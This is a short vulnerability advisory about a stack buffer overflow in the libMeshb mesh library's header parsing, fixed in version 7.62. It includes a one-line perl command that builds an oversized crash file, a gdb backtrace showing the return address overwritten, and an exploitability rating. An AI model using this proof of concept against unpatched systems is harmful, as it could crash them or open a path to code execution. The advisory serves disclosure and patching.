libMeshb Buffer Overflow

libMeshb suffers from a buffer overflow vulnerability. Version 7.62 has been released to address this issue.

SHA-256 | 4eb31ef6c78c0a4496bb470b1fbeb940f7fb6e6336a12f36aa32c13366a7a515


libMeshb is a library which supports moving between data types for the Gamma Mesh Format. A buffer overflow was found when parsing the MESH format and specially crafted .mesh files could allow for arbitrary code execution.


No magic bytes or valid header necessary as the bug appears to be an unbounded fscanf() processing mesh headers.

echo -ne `perl -e 'print "B" x 2176'` > test.mesh


(gdb) r test.mesh /tmp/empty.mesh
Starting program: mesh2poly test.mesh /tmp/empty.mesh

*** stack smashing detected ***: terminated

Program received signal SIGABRT, Aborted.
__GI_raise ([email protected]=6) at ../sysdeps/unix/sysv/linux/raise.c:50

(gdb) bt
#0 __GI_raise ([email protected]=6) at ../sysdeps/unix/sysv/linux/raise.c:50
#1 0x00007ffff7ddb859 in __GI_abort () at abort.c:79
#2 0x00007ffff7e463ee in __libc_message ([email protected]=do_abort, [email protected]=0x7ffff7f7007c "*** %s ***: terminated\n") at ../sysdeps/posix/libc_fatal.c:155
#3 0x00007ffff7ee8b4a in __GI___fortify_fail ([email protected]=0x7ffff7f70064 "stack smashing detected") at fortify_fail.c:26
#4 0x00007ffff7ee8b16 in __stack_chk_fail () at stack_chk_fail.c:24
#5 0x000055555555b5d2 in GmfOpenMesh ()
#6 0x4242424242424242 in ?? ()
#7 0x0000000000000000 in ?? ()

(gdb) exploitable
Description: Stack buffer overflow
Short description: StackBufferOverflow (6/22)
Hash: ea307ff89c1110d6e6c6f565bfc6a9ce.350b4f5ab2938b2eb4fa0a598f3508e1
Exploitability Classification: EXPLOITABLE
Explanation: The target stopped while handling a signal that was generated by libc due to detection of a stack buffer overflow. Stack buffer overflows are generally considered exploitable.
Other tags: PossibleStackCorruption (7/22), AbortSignal (20/22)

This also affects the python wrapper library pymeshb.

>>> import pymeshb
*** stack smashing detected ***: terminated
Aborted (core dumped)


libMeshb v7.62


Related Posts